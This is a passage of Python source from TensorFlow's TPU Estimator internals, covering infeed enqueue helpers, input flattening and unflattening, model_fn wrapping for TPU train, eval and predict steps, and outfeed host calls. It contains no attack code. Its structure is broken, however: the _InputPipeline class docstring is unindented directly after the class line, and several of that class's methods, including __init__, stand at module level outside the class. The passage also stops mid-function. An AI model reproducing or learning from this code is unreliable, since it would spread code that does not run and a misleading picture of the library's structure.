    input_fn: user input function; invoked once per core on this host.
    inputs_structure_recorder: records the features/labels structure so it can
      be restored after dequeue.

  Returns:
    A `(enqueue_ops_fn, captured_infeed_queue)` tuple; the infeed queue is
    captured lazily because it is only constructed when `enqueue_ops_fn` runs.
  """
  captured_infeed_queue = _CapturedObject()

  def enqueue_ops_fn():
    """A fn returns enqueue_ops."""
    num_cores_per_host = ctx.num_of_cores_per_host
    per_host_sharded_inputs = []
    # One input_fn invocation per core; each produces one shard of inputs.
    for core_ordinal in range(num_cores_per_host):
      with ops.name_scope('ordinal_%d' % (core_ordinal)):
        inputs = _Inputs.from_input_fn(input_fn())
        if inputs.is_dataset:
          raise TypeError(
              '`input_fn` returning `Dataset` is not yet supported in '
              'per-Core input pipeline deployment yet. Please set '
              'TPUConfig.per_host_input_for_training to True or return '
              '`features` and `labels` from `input_fn`')
        features, labels = inputs.features_and_labels()
        inputs_structure_recorder.validate_and_record_structure(
            features, labels)
        flattened_inputs = (
            inputs_structure_recorder.flatten_features_and_labels(
                features, labels))
        per_host_sharded_inputs.append(flattened_inputs)
    # The queue is sized/typed from the first shard's flattened tensors.
    infeed_queue = tpu_feed.InfeedQueue(
        number_of_tuple_elements=len(per_host_sharded_inputs[0]))
    captured_infeed_queue.capture(infeed_queue)
    infeed_queue.set_configuration_from_sharded_input_tensors(
        per_host_sharded_inputs)
    per_host_enqueue_ops = infeed_queue.generate_enqueue_ops(
        per_host_sharded_inputs, tpu_ordinal_function=ctx.tpu_ordinal_function)
    return per_host_enqueue_ops
  return enqueue_ops_fn, captured_infeed_queue
def generate_per_host_enqueue_ops_fn_for_host(
    ctx, input_fn, inputs_structure_recorder, batch_axis, device, host_id):
  """Generates infeed enqueue ops for per-host input_fn on a single host.

  Args:
    ctx: the `_TPUContext` holding deployment information.
    input_fn: user input function; invoked once for this host.
    inputs_structure_recorder: records the features/labels structure so it can
      be restored after dequeue.
    batch_axis: per-tensor shard dimensions, or None.
    device: the host device on which input ops are placed.
    host_id: index of this host (used for model-parallel ordinal lookup).

  Returns:
    A `(enqueue_ops_fn, captured_infeed_queue, hooks, is_dataset)` tuple.
  """
  captured_infeed_queue = _CapturedObject()
  hooks = []
  with ops.device(device):
    inputs = _Inputs.from_input_fn(input_fn())
    is_dataset = inputs.is_dataset
    if ctx.mode == model_fn_lib.ModeKeys.PREDICT:
      if not is_dataset:
        raise TypeError(
            'For mode PREDICT, `input_fn` must return `Dataset` instead of '
            '`features` and `labels`.')
      if batch_axis is not None:
        raise TypeError('For mode PREDICT, batch_axis is not supported yet.')
      # Wrap the dataset so each batch carries a stopping signal (and padding)
      # used to detect end-of-input during prediction.
      inputs = _InputsWithStoppingSignals(
          dataset=inputs.dataset, batch_size=ctx.batch_size_for_input_fn,
          add_padding=True)
    if is_dataset:
      hooks.append(inputs.dataset_initializer_hook())

  # TODO(ylc): Refactoring the code to merge the tpu ordinal logic here and the
  # _TPUContext.tpu_ordinal_function. We should either introduce another
  # abstraction or a different helper method.
  def _tpu_ordinal_function_impl(shard_index_in_host):
    # We put both enqueue/dequeue op at tpu.core(0) in each replica.
    replica = ctx.device_assignment.lookup_replicas(
        host_id, (0, 0, 0))[shard_index_in_host]
    return ctx.device_assignment.tpu_ordinal(replica=replica)

  if ctx.model_parallelism_enabled:
    tpu_ordinal_function = _tpu_ordinal_function_impl
  else:
    tpu_ordinal_function = None

  def enqueue_ops_fn():
    with ops.device(device):
      num_of_replicas_per_host = ctx.num_of_replicas_per_host
      # Convert user input to features and labels. If the user returns a
      # dataset, it is initialized and the features and labels extracted via
      # `dataset.iterator.get_next()`
      features, labels = inputs.features_and_labels()
      signals = inputs.signals()
      inputs_structure_recorder.validate_and_record_structure(
          features, labels, signals)
      unsharded_tensor_list = (
          inputs_structure_recorder.flatten_features_and_labels(
              features, labels, signals))
      infeed_queue = tpu_feed.InfeedQueue(
          tuple_types=[t.dtype for t in unsharded_tensor_list],
          tuple_shapes=[t.shape for t in unsharded_tensor_list],
          shard_dimensions=batch_axis)
      captured_infeed_queue.capture(infeed_queue)
      infeed_queue.set_number_of_shards(num_of_replicas_per_host)
      # The host-level batch is split along batch_axis into one shard per
      # replica on this host.
      per_host_enqueue_ops = (
          infeed_queue.split_inputs_and_generate_enqueue_ops(
              unsharded_tensor_list,
              placement_function=lambda x: device,
              tpu_ordinal_function=tpu_ordinal_function))
      if signals is None:
        return per_host_enqueue_ops
      else:
        return {
            'ops': per_host_enqueue_ops,
            'signals': signals,
        }
  return enqueue_ops_fn, captured_infeed_queue, hooks, is_dataset
def generate_per_host_v2_enqueue_ops_fn_for_host(
    ctx, input_fn, inputs_structure_recorder, device, host_id):
  """Generates infeed enqueue ops for per-host input_fn on a single host.

  In PER_HOST_V2 mode the `input_fn` must return a `Dataset`; it is drawn from
  once per replica on this host to build per-replica shards.

  Args:
    ctx: the `_TPUContext` holding deployment information.
    input_fn: user input function; must return a `Dataset`.
    inputs_structure_recorder: records the features/labels structure so it can
      be restored after dequeue.
    device: the host device on which input ops are placed.
    host_id: index of this host (unused here).

  Returns:
    A `(enqueue_ops_fn, captured_infeed_queue, hooks, is_dataset)` tuple.
  """
  del host_id  # unused
  captured_infeed_queue = _CapturedObject()
  hooks = []
  with ops.device(device):
    inputs = _Inputs.from_input_fn(input_fn())
    is_dataset = inputs.is_dataset
    if not is_dataset:
      raise TypeError('`input_fn` must return a `Dataset` for the PER_HOST_V2 '
                      'input pipeline configuration.')
    if ctx.mode == model_fn_lib.ModeKeys.PREDICT:
      # TODO(b/XXX): Add predict support for PER_HOST_V2
      # BUG FIX: message previously read "Most PREDICT" instead of
      # "Mode PREDICT".
      raise TypeError('Mode PREDICT not yet supported in PER_HOST_V2 mode.')
    hooks.append(inputs.dataset_initializer_hook())

  def enqueue_ops_fn():
    """Generates the per_host enqueue ops."""
    control_deps = []
    per_host_sharded_inputs = []
    num_replicas_per_host = ctx.num_of_replicas_per_host
    with ops.device(device):
      if not inputs.is_dataset:
        raise TypeError('`input_fn` must return a `Dataset` for this mode.')
      for _ in range(num_replicas_per_host):
        # Use control dependencies to ensure a deterministic ordering.
        with ops.control_dependencies(control_deps):
          features, labels = inputs.features_and_labels()  # Calls get_next()
        inputs_structure_recorder.validate_and_record_structure(
            features, labels)
        flattened_inputs = (
            inputs_structure_recorder.flatten_features_and_labels(
                features, labels))
        control_deps.extend(flattened_inputs)
        per_host_sharded_inputs.append(flattened_inputs)
      # The queue is sized/typed from the first replica's flattened tensors.
      infeed_queue = tpu_feed.InfeedQueue(
          number_of_tuple_elements=len(per_host_sharded_inputs[0]))
      captured_infeed_queue.capture(infeed_queue)
      infeed_queue.set_configuration_from_sharded_input_tensors(
          per_host_sharded_inputs)
      per_host_enqueue_ops = infeed_queue.generate_enqueue_ops(
          per_host_sharded_inputs, tpu_ordinal_function=ctx.tpu_ordinal_function)
      return per_host_enqueue_ops
  return enqueue_ops_fn, captured_infeed_queue, hooks, is_dataset
class _InputPipeline(object):
"""`_InputPipeline` handles invoking `input_fn` and piping to infeed queue.
`_InputPipeline` abstracts the per-core/per-host `input_fn` invocation from
call site. To be precise, based on the configuration in `_TPUContext`, it
invokes `input_fn` for all cores (usually multi-host TPU training) or for one
host (usually for single-host TPU evaluation), and sends all `features` and
`labels` returned by `input_fn` to TPU infeed. For per-core invocation,
`features` and `labels` are piped to infeed directly, one tuple for each
core. For per-host invocation, `features` and `labels` are split at host
(with respect to `batch_axis`) and piped to all cores accordingly.
In addition, flatten/unflatten are handled by `_InputPipeline` also. Model
inputs returned by the `input_fn` can have one of the following forms:
1. features
2. (features, labels)
Internally, form 1 is reformed to `(features, None)` as features and labels
are passed separately to underlying methods. For TPU training, TPUEstimator
may expect multiple `features` and `labels` tuples one for each core.
TPUEstimator allows various different structures for inputs (namely `features`
and `labels`). `features` can be `Tensor` or dict of string name to `Tensor`,
and `labels` could be `None`, `Tensor`, or dict of string name to `Tensor`.
TPU infeed/outfeed library expects flattened tensor list. So, `features` and
`labels` need to be flattened, before infeed enqueue, and the structure of
them needs to be recorded, in order to restore them after infeed dequeue.
"""
  class InputsStructureRecorder(object):
    """Records the structure of `features`/`labels` for flatten/unflatten.

    TPU infeed/outfeed moves flat tensor lists; this recorder remembers the
    dict key ordering (sorted) so the original structure can be rebuilt
    after dequeue. The recorded structure must be identical across calls.
    """

    def __init__(self):
      # Holds the structure of inputs
      self._feature_names = []
      self._label_names = []
      self._has_labels = False
      self._signals_helper = None
      # Internal state.
      self._initialized = False

    def has_labels(self):
      # True once a (features, labels) pair with labels has been recorded.
      return self._has_labels

    def validate_and_record_structure(self, features, labels, signals=None):
      """Validates and records the structure of `features` and `labels`."""

      def _extract_key_names(tensor_or_dict):
        # Sorted keys for dicts; empty list for single tensors (or None).
        if tensor_or_dict is None:
          return []
        return sorted(tensor_or_dict.keys()) if isinstance(
            tensor_or_dict, dict) else []

      # Extract structure.
      has_labels = labels is not None
      feature_names = _extract_key_names(features)
      label_names = _extract_key_names(labels)
      if signals is not None and self._signals_helper is None:
        # Record signals helper.
        self._signals_helper = _SignalsHelper(signals)
      if self._initialized:
        # Verify the structure is same. The following should never happen.
        assert feature_names == self._feature_names, 'feature keys mismatched'
        assert label_names == self._label_names, 'label keys mismatched'
        assert has_labels == self._has_labels, 'label presence mismatched'
      else:
        # Record structure.
        self._initialized = True
        self._feature_names = feature_names
        self._label_names = label_names
        self._has_labels = has_labels

    def flatten_features_and_labels(self, features, labels, signals=None):
      """Flattens the `features` and `labels` to a single tensor list.

      Order is: features (in recorded key order), then labels, then signals;
      `unflatten_features_and_labels` relies on exactly this ordering.
      """
      flattened_inputs = []
      if self._feature_names:
        # We need a fixed ordering for enqueueing and dequeueing.
        flattened_inputs.extend(
            [features[name] for name in self._feature_names])
      else:
        flattened_inputs.append(features)
      if labels is not None:
        if self._label_names:
          # We need a fixed ordering for enqueueing and dequeueing.
          flattened_inputs.extend([labels[name] for name in self._label_names])
        else:
          flattened_inputs.append(labels)
      if signals is not None:
        flattened_inputs.extend(_SignalsHelper.as_tensor_list(signals))
      return flattened_inputs

    def unflatten_features_and_labels(self, flattened_inputs):
      """Restores the flattened inputs to original features and labels form.

      Args:
        flattened_inputs: Flattened inputs for each shard.

      Returns:
        A tuple of (`features`, `labels`), where `labels` could be None.
        Each one, if present, should have identical structure (single tensor vs
        dict) as the one returned by input_fn.

      Raises:
        ValueError: If the number of expected tensors from `flattened_inputs`
          mismatches the recorded structure.
      """
      # Expected counts are derived from the recorded structure; a single
      # (non-dict) tensor counts as 1.
      expected_num_features = (
          len(self._feature_names) if self._feature_names else 1)
      if self._has_labels:
        expected_num_labels = (
            len(self._label_names) if self._label_names else 1)
      else:
        expected_num_labels = 0
      expected_num_signals = (
          self._signals_helper.num_signals if self._signals_helper else 0)
      expected_num_tensors = (
          expected_num_features + expected_num_labels + expected_num_signals)
      if expected_num_tensors != len(flattened_inputs):
        raise ValueError(
            'The number of flattened tensors mismatches expected num. '
            'Expected {}, got {}'.format(expected_num_tensors,
                                         len(flattened_inputs)))
      if self._feature_names:
        unflattened_features = dict(
            zip(self._feature_names, flattened_inputs[:expected_num_features]))
      else:
        # Single tensor case
        unflattened_features = flattened_inputs[0]
      if expected_num_labels == 0:
        unflattened_label = None
      elif self._label_names:
        label_list = flattened_inputs[
            expected_num_features:expected_num_features + expected_num_labels]
        unflattened_label = dict(zip(self._label_names, label_list))
      else:
        # Single tensor case.
        unflattened_label = flattened_inputs[expected_num_features]
      signals = None
      if expected_num_signals != 0:
        tensor_list_for_signals = flattened_inputs[
            expected_num_features + expected_num_labels:]
        signals = self._signals_helper.unflatten(tensor_list_for_signals)
      return _Inputs(unflattened_features, unflattened_label, signals=signals)
def __init__(self, input_fn, batch_axis, ctx):
  """Constructor.

  Args:
    input_fn: input fn for train or eval.
    batch_axis: A python tuple of int values describing how each tensor
      produced by the Estimator `input_fn` should be split across the TPU
      compute shards.
    ctx: A `_TPUContext` instance with mode.

  Raises:
    ValueError: If both `sharded_features` and `num_cores` are `None`.
  """
  self._input_fn = input_fn
  self._batch_axis = batch_axis
  self._ctx = ctx
  # Tracks whether features/labels are single tensors or dicts of tensors.
  self._inputs_structure_recorder = _InputPipeline.InputsStructureRecorder()
  # True when each core runs its own input pipeline (per-shard mode).
  self._sharded_per_core = ctx.is_input_sharded_per_core()
  # Populated later by generate_infeed_enqueue_ops_and_dequeue_fn().
  self._infeed_queue = None
def generate_infeed_enqueue_ops_and_dequeue_fn(self):
  """Generates infeed enqueue ops and dequeue_fn."""
  # Deploying the input pipeline records the input structure as a side
  # effect: while tf.while_loop is being built, the body function (the
  # enqueue_fn passed in) is invoked to construct the graph.
  enqueue_ops, all_hooks, run_infeed_loop_on_coordinator = (
      self._invoke_input_fn_and_record_structure())

  self._validate_input_pipeline()

  def dequeue_fn():
    """dequeue_fn is used by TPU to retrieve the tensors."""
    # In the model-parallel case, both the host-side and device-side
    # computations must agree on the core on which infeed takes place. We
    # choose to perform infeed on logical core 0 of each replica.
    dequeued = self._infeed_queue.generate_dequeue_op(tpu_device=0)
    # The unflatten process uses the structure information recorded above.
    return self._inputs_structure_recorder.unflatten_features_and_labels(
        dequeued)

  return (enqueue_ops, dequeue_fn, all_hooks, run_infeed_loop_on_coordinator)
def _invoke_input_fn_and_record_structure(self):
  """Deploys the input pipeline and records the input structure.

  Returns:
    A tuple (enqueue_ops, all_hooks, run_infeed_loop_on_coordinator):
    enqueue_ops has one entry per host; all_hooks collects the hooks
    returned by the per-host deployment helpers; the final flag tells the
    caller whether the coordinator must drive the infeed loop in Python
    instead of relying on a tf.while_loop in the graph.
  """
  enqueue_ops = []
  infeed_queues = []
  all_hooks = []
  num_hosts = self._ctx.num_hosts
  tpu_host_placement_fn = self._ctx.tpu_host_placement_function

  # Assume Python-driven infeed until a while-loop wrapping proves otherwise.
  run_infeed_loop_on_coordinator = True

  if self._sharded_per_core:
    # Per-Core input pipeline deployment.
    # Invoke input pipeline for each core and placed on the corresponding
    # host.
    for host_id in range(num_hosts):
      host_device = tpu_host_placement_fn(host_id=host_id)
      with ops.device(host_device):
        with ops.name_scope('input_pipeline_task%d' % (host_id)):
          enqueue_ops_fn, captured_infeed_queue = (
              generate_per_core_enqueue_ops_fn_for_host(
                  self._ctx, self._input_fn, self._inputs_structure_recorder))

          if _WRAP_INPUT_FN_INTO_WHILE_LOOP:
            run_infeed_loop_on_coordinator = False
            enqueue_ops.append(
                _wrap_computation_in_while_loop(
                    device=host_device, op_fn=enqueue_ops_fn))
          else:
            enqueue_ops.append(enqueue_ops_fn())
          # Infeed_queue_getter must be called after enqueue_ops_fn is
          # called, because calling enqueue_ops_fn is what populates the
          # captured queue.
          infeed_queues.append(captured_infeed_queue.get())
  else:
    # Per-host input pipeline deployment.
    for host_id in range(num_hosts):
      host_device = tpu_host_placement_fn(host_id=host_id)
      with ops.device(host_device):
        with ops.name_scope('input_pipeline_task%d' % (host_id)):
          if self._ctx.is_input_per_host_with_iterators():
            enqueue_ops_fn, captured_infeed_queue, hooks, is_dataset = (
                generate_per_host_v2_enqueue_ops_fn_for_host(
                    self._ctx, self._input_fn,
                    self._inputs_structure_recorder, host_device, host_id))
          else:
            enqueue_ops_fn, captured_infeed_queue, hooks, is_dataset = (
                generate_per_host_enqueue_ops_fn_for_host(
                    self._ctx, self._input_fn,
                    self._inputs_structure_recorder, self._batch_axis,
                    host_device, host_id))
          all_hooks.extend(hooks)

          # NOTE(xiejw): We dispatch here based on the return type of the
          # users `input_fn`.
          #
          # 1. If input_fn returns a Dataset instance, we initialize the
          # iterator outside of tf.while_loop, and call the iterator.get_next
          # inside tf.while_loop. This should be always safe.
          #
          # 2. If input_fn returns (features, labels), it is too late to wrap
          # them inside tf.while_loop, as resource initialization cannot be
          # handled in TF control flow properly. In this case, we will use
          # python loop to enqueue the data into TPU system. This may be
          # slow compared to the previous case.
          if is_dataset:
            run_infeed_loop_on_coordinator = False
            # PREDICT mode uses the stopping-signals variant so the loop can
            # terminate on end-of-input.
            wrap_fn = (
                _wrap_computation_in_while_loop
                if self._ctx.mode != model_fn_lib.ModeKeys.PREDICT else
                _wrap_computation_in_while_loop_with_stopping_signals)
            enqueue_ops.append(
                wrap_fn(device=host_device, op_fn=enqueue_ops_fn))
          else:
            enqueue_ops.append(enqueue_ops_fn())
          infeed_queues.append(captured_infeed_queue.get())
  # infeed_queue is used to generate dequeue ops. The only thing it uses for
  # dequeue is dtypes and types. So, any one can be used. Here, grab the
  # first one.
  self._infeed_queue = infeed_queues[0]
  return enqueue_ops, all_hooks, run_infeed_loop_on_coordinator
def _validate_input_pipeline(self):
  """Warns (or raises) if the input pipeline uses QueueRunners."""
  # QueueRunner-based pipelines can be slow and do not scale. Ideally this
  # would always be a hard error with a friendly message, but when
  # _WRAP_INPUT_FN_INTO_WHILE_LOOP is False (legacy behavior) we must not
  # break existing user code, so only a warning is logged in that case.
  queue_runners = ops.get_default_graph().get_collection(
      ops.GraphKeys.QUEUE_RUNNERS)
  if not queue_runners:
    return
  err_msg = ('Input pipeline contains one or more QueueRunners. '
             'It could be slow and not scalable. Please consider '
             'converting your input pipeline to use `tf.data` instead (see '
             'https://www.tensorflow.org/programmers_guide/datasets for '
             'instructions.')
  if _WRAP_INPUT_FN_INTO_WHILE_LOOP:
    raise RuntimeError(err_msg)
  logging.warn(err_msg)
class _ModelFnWrapper(object):
  """A `model_fn` wrapper.

  This makes calling model_fn on CPU and TPU easier and more consistent and
  performs necessary check and mutation required by TPU training and
  evaluation.

  In addition, this wrapper manages converting the `model_fn` to a single TPU
  train and eval step.
  """

  def __init__(self, model_fn, config, params, ctx):
    self._model_fn = model_fn
    self._config = config
    self._params = params
    self._ctx = ctx

  def call_without_tpu(self, features, labels, is_export_mode):
    # Invokes the user model_fn directly; no infeed/outfeed rewriting.
    return self._call_model_fn(features, labels, is_export_mode=is_export_mode)

  def convert_to_single_tpu_train_step(self, dequeue_fn):
    """Converts user provided `model_fn` as a single train step on TPU.

    The user provided `model_fn` takes input tuple
    (features, labels) and produces the EstimatorSpec with train_op and loss
    for train `mode`. This usually represents a single train computation on
    CPU.

    For TPU training, a train (computation) step is first wrapped in a
    tf.while_loop control flow to repeat for many times and then replicated
    to all TPU shards. Besides the input should be taken from TPU infeed
    rather than input pipeline (input_fn) directly. To fit TPU loop and
    replicate pattern, the original train computation should be reformed,
    which is the returned `train_step`.

    Args:
      dequeue_fn: The function to retrieve inputs, features and labels, from
        TPU infeed dequeue channel.

    Returns:
      A tuple of train_fn, host_calls, and captured scaffold_fn. The train_fn
      representing the train step for TPU.
    """
    host_call = _OutfeedHostCall(self._ctx)
    captured_scaffold_fn = _CapturedObject()

    def train_step(loss):
      """Training step function for use inside a while loop."""
      del loss  # unused; required in function signature.
      inputs = dequeue_fn()
      features, labels = inputs.features_and_labels()

      estimator_spec = self._verify_estimator_spec(
          self._call_model_fn(features, labels))
      loss, train_op = estimator_spec.loss, estimator_spec.train_op

      if isinstance(estimator_spec, TPUEstimatorSpec):
        captured_scaffold_fn.capture(estimator_spec.scaffold_fn)
      else:
        captured_scaffold_fn.capture(None)

      # We must run train_op to update the variables prior to running the
      # outfeed.
      with ops.control_dependencies([train_op]):
        host_call_outfeed_ops = []
        if (isinstance(estimator_spec, TPUEstimatorSpec) and
            estimator_spec.host_call is not None):
          host_call.record({'host_call': estimator_spec.host_call})
          host_call_outfeed_ops = host_call.create_enqueue_op()
        with ops.control_dependencies(host_call_outfeed_ops):
          return array_ops.identity(loss)

    return train_step, host_call, captured_scaffold_fn

  def convert_to_single_tpu_eval_step(self, dequeue_fn):
    """Converts user provided `model_fn` as a single eval step on TPU.

    Similar to training, the user provided `model_fn` takes input tuple
    (features, labels) and produces the TPUEstimatorSpec with eval_metrics
    for eval `mode`. This usually represents a single evaluation computation
    on CPU.

    For TPU evaluation, a eval (computation) step is first wrapped in a
    tf.while_loop control flow to repeat for many times and then replicated
    to all TPU shards. Besides the input and output are slightly different.
    Input, features and labels, should be taken from TPU infeed rather than
    input pipeline (input_fn) directly. Output is managed in two stages.
    First, the model outputs as the result of evaluation computation, usually
    model logits, should be transferred from TPU system to CPU. Then, all
    model outputs are concatenated first on CPU and sent to the metric_fn for
    metrics computation. To fit TPU evaluation pattern, the original eval
    computation should be reformed, which is the returned `eval_step`.

    Args:
      dequeue_fn: The function to retrieve inputs, features and labels, from
        TPU infeed dequeue channel.

    Returns:
      A tuple of eval_fn, host_calls, and captured scaffold_fn. The eval_fn
      representing the eval step for TPU.
    """
    host_calls = _OutfeedHostCall(self._ctx)
    captured_scaffold_fn = _CapturedObject()

    def eval_step(total_loss):
      """Evaluation step function for use inside a while loop."""
      inputs = dequeue_fn()
      features, labels = inputs.features_and_labels()

      tpu_estimator_spec = self._call_model_fn(features, labels)
      if not isinstance(tpu_estimator_spec, TPUEstimatorSpec):
        raise RuntimeError(
            'estimator_spec used by TPU evaluation must have type'
            '`TPUEstimatorSpec`. Got {}'.format(type(tpu_estimator_spec)))

      loss = tpu_estimator_spec.loss
      captured_scaffold_fn.capture(tpu_estimator_spec.scaffold_fn)
      to_record = {}
      to_record['eval_metrics'] = tpu_estimator_spec.eval_metrics
      if tpu_estimator_spec.host_call is not None:
        # We assume that evaluate won't update global step, so we don't wrap
        # this host_call.
        to_record['host_call'] = tpu_estimator_spec.host_call
      host_calls.record(to_record)

      # Accumulate the per-step loss; the enqueue op must run before the
      # loop-carried sum is produced.
      with ops.control_dependencies(host_calls.create_enqueue_op()):
        return math_ops.add(total_loss, loss)

    return eval_step, host_calls, captured_scaffold_fn

  def convert_to_single_tpu_predict_step(self, dequeue_fn):
    """Converts user provided `model_fn` as a single predict step on TPU.

    Args:
      dequeue_fn: The function to retrieve inputs, features and labels, from
        TPU infeed dequeue channel.

    Returns:
      A tuple of predict_fn, host_calls, and captured scaffold_fn. The
      predict_fn representing the predict step for TPU.
    """
    host_calls = _OutfeedHostCall(self._ctx)
    captured_scaffold_fn = _CapturedObject()

    def predict_step(unused_scalar_stopping_signal):
      """Prediction step function for use inside a while loop."""
      inputs = dequeue_fn()
      features, labels = inputs.features_and_labels()
      stopping_signals = inputs.signals()

      assert stopping_signals is not None, (
          'Internal Error: `signals` is missing.')

      tpu_estimator_spec = self._call_model_fn(
          features, labels, is_export_mode=False)
      if not isinstance(tpu_estimator_spec, TPUEstimatorSpec):
        raise RuntimeError(
            'estimator_spec used by TPU prediction must have type'
            '`TPUEstimatorSpec`. Got {}'.format(type(tpu_estimator_spec)))

      captured_scaffold_fn.capture(tpu_estimator_spec.scaffold_fn)
      to_record = {}
      identity_fn = lambda **kwargs: kwargs
      # TODO(xiejw): Adds validation for prediction dictionary.
      # TODO(xiejw): Adds support for single tensor as predictions.
      if not isinstance(tpu_estimator_spec.predictions, dict):
        raise TypeError('TPUEstimatorSpec.predictions must be dict of Tensors.')
      to_record['predictions'] = [identity_fn, tpu_estimator_spec.predictions]
      to_record['signals'] = [identity_fn, stopping_signals]
      if tpu_estimator_spec.host_call is not None:
        to_record['host_call'] = tpu_estimator_spec.host_call
      host_calls.record(to_record)

      with ops.control_dependencies(host_calls.create_enqueue_op()):
        return _StopSignals.as_scalar_stopping_signal(stopping_signals)

    return predict_step, host_calls, captured_scaffold_fn

  def _call_model_fn(self, features, labels, is_export_mode=False):
    """Calls the model_fn with required parameters."""
    model_fn_args = util.fn_args(self._model_fn)
    kwargs = {}

    # Makes deep copies of `config` and `params` in case user mutates them.
    config = copy.deepcopy(self._config)
    params = copy.deepcopy(self._params)

    if 'labels' in model_fn_args:
      kwargs['labels'] = labels
    elif labels is not None:
      raise ValueError(
          'model_fn does not take labels, but input_fn returns labels.')
    if 'mode' in model_fn_args:
      kwargs['mode'] = self._ctx.mode
    if 'config' in model_fn_args:
      kwargs['config'] = config
    if 'params' in model_fn_args:
      kwargs['params'] = params

    if 'params' not in model_fn_args:
      raise ValueError('model_fn ({}) does not include params argument, '
                       'required by TPUEstimator to pass batch size as '
                       'params[\'batch_size\']'.format(self._model_fn))

    if is_export_mode:
      # Exported models do not receive a batch size in params.
      batch_size_for_model_fn = None
    else:
      batch_size_for_model_fn = self._ctx.batch_size_for_model_fn

    if batch_size_for_model_fn is not None:
      params[_BATCH_SIZE_KEY] = batch_size_for_model_fn

    estimator_spec = self._model_fn(features=features, **kwargs)
    if (self._ctx.is_running_on_cpu(is_export_mode) and
        isinstance(estimator_spec, TPUEstimatorSpec)):
      # The estimator_spec will be passed to `Estimator` directly, which
      # expects type `EstimatorSpec`.
      return estimator_spec.as_estimator_spec()
    else:
      return estimator_spec

  def _verify_estimator_spec(self, estimator_spec):
    """Validates the estimator_spec."""
    if isinstance(estimator_spec, TPUEstimatorSpec):
      return estimator_spec

    # Plain EstimatorSpec: hooks are not supported under TPU rewriting.
    err_msg = '{} returned by EstimatorSpec is not supported in TPUEstimator.'
    if estimator_spec.training_chief_hooks:
      raise ValueError(err_msg.format('training_chief_hooks'))
    if estimator_spec.training_hooks:
      raise ValueError(err_msg.format('training_hooks'))
    if estimator_spec.evaluation_hooks:
      raise ValueError(err_msg.format('evaluation_hooks'))

    if estimator_spec.scaffold:
      logging.warning('EstimatorSpec.Scaffold is ignored by TPU train/eval. '
                      'Please use TPUEstimatorSpec.')
    return estimator_spec
class _OutfeedHostCall(object):
  """Support for `eval_metrics` and `host_call` in TPUEstimatorSpec."""

  def __init__(self, ctx):
    self._ctx = ctx
    self._names = []
    # All of these are dictionaries of lists keyed on the name.
    self._host_fns = {}
    self._tensor_keys = collections.defaultdict(list)
    self._tensors = collections.defaultdict(list)
    self._tensor_dtypes = collections.defaultdict(list)
    self._tensor_shapes = collections.defaultdict(list)

  @staticmethod
  def validate(host_calls):
    """Validates the `eval_metrics` and `host_call` in `TPUEstimatorSpec`."""

    for name, host_call in host_calls.items():
      if not isinstance(host_call, (tuple, list)):
        raise ValueError('{} should be tuple or list'.format(name))
      if len(host_call) != 2:
        raise ValueError('{} should have two elements.'.format(name))
      if not callable(host_call[0]):
        raise TypeError('{}[0] should be callable.'.format(name))
      if not isinstance(host_call[1], (tuple, list, dict)):
        raise ValueError('{}[1] should be tuple or list, or dict.'.format(name))

      if isinstance(host_call[1], (tuple, list)):
        fullargspec = tf_inspect.getfullargspec(host_call[0])
        fn_args = util.fn_args(host_call[0])
        # wrapped_hostcall_with_global_step uses varargs, so we allow that.
        if fullargspec.varargs is None and len(host_call[1]) != len(fn_args):
          raise RuntimeError(
              'In TPUEstimatorSpec.{}, length of tensors {} does not match '
              'method args of the function, which takes {}.'.format(
                  name, len(host_call[1]), len(fn_args)))

  @staticmethod
  def create_cpu_hostcall(host_calls):
    """Runs on the host_call on CPU instead of TPU when use_tpu=False."""

    _OutfeedHostCall.validate(host_calls)
    ret = {}
    for name, host_call in host_calls.items():
      host_fn, tensors = host_call
      if isinstance(tensors, (tuple, list)):
        ret[name] = host_fn(*tensors)
      else:
        # Must be dict.
        try:
          ret[name] = host_fn(**tensors)
        except TypeError as e:
          # Surface a hint about mismatched kwargs before re-raising.
          logging.warning(
              'Exception while calling %s: %s. It is likely the tensors '
              '(%s[1]) do not match the '
              'function\'s arguments', name, e, name)
          raise e
    return ret

  def record(self, host_calls):
    """Records the host_call structure."""
    for name, host_call in host_calls.items():
      host_fn, tensor_list_or_dict = host_call
      self._names.append(name)
      self._host_fns[name] = host_fn

      if isinstance(tensor_list_or_dict, dict):
        # Dict case: remember the keys so the dict can be rebuilt on dequeue.
        for (key, tensor) in six.iteritems(tensor_list_or_dict):
          self._tensor_keys[name].append(key)
          self._tensors[name].append(tensor)
          self._tensor_dtypes[name].append(tensor.dtype)
          self._tensor_shapes[name].append(tensor.shape)
      else:
        # List or tuple.
        self._tensor_keys[name] = None
        for tensor in tensor_list_or_dict:
          self._tensors[name].append(tensor)
          self._tensor_dtypes[name].append(tensor.dtype)
          self._tensor_shapes[name].append(tensor.shape)

  def create_enqueue_op(self):
    """Create the op to enqueue the recorded host_calls.

    Returns:
      A list of enqueue ops, which is empty if there are no host calls.
    """
    if not self._names:
      return []

    tensors = []
    # TODO(jhseu): Consider deduping tensors.
    for name in self._names:
      tensors.extend(self._tensors[name])

    with ops.device(tpu.core(0)):
      return [tpu_ops.outfeed_enqueue_tuple(tensors)]

  def create_tpu_hostcall(self):
    """Sends the tensors through outfeed and runs the host_fn on CPU.

    The tensors are concatenated along dimension 0 to form a global tensor
    across all shards. The concatenated function is passed to the host_fn and
    executed on the first host.

    Returns:
      A dictionary mapping name to the return type of the host_call by that
      name.

    Raises:
      RuntimeError: If outfeed tensor is scalar.
    """
    if not self._names:
      # NOTE(review): returns [] here while the populated path returns a
      # dict; callers appear to rely only on emptiness — confirm.
      return []

    ret = {}
    # For each i, dequeue_ops[i] is a list containing the tensors from all
    # shards. This list is concatenated later.
    dequeue_ops = []
    tensor_dtypes = []
    tensor_shapes = []
    for name in self._names:
      for _ in self._tensors[name]:
        dequeue_ops.append([])
      for dtype in self._tensor_dtypes[name]:
        tensor_dtypes.append(dtype)
      for shape in self._tensor_shapes[name]:
        tensor_shapes.append(shape)

    # Outfeed ops execute on each replica's first logical core. Note: we must
    # constraint it such that we have at most one outfeed dequeue and enqueue
    # per replica.
    tpu_device_placement_fn = self._ctx.tpu_device_placement_function
    for i in xrange(self._ctx.num_replicas):
      with ops.device(tpu_device_placement_fn(i)):
        outfeed_tensors = tpu_ops.outfeed_dequeue_tuple(
            dtypes=tensor_dtypes, shapes=tensor_shapes)
        for j, item in enumerate(outfeed_tensors):
          dequeue_ops[j].append(item)

    # Deconstruct dequeue ops.
    dequeue_ops_by_name = {}
    pos = 0
    for name in self._names:
      dequeue_ops_by_name[name] = dequeue_ops[pos:pos+len(self._tensors[name])]
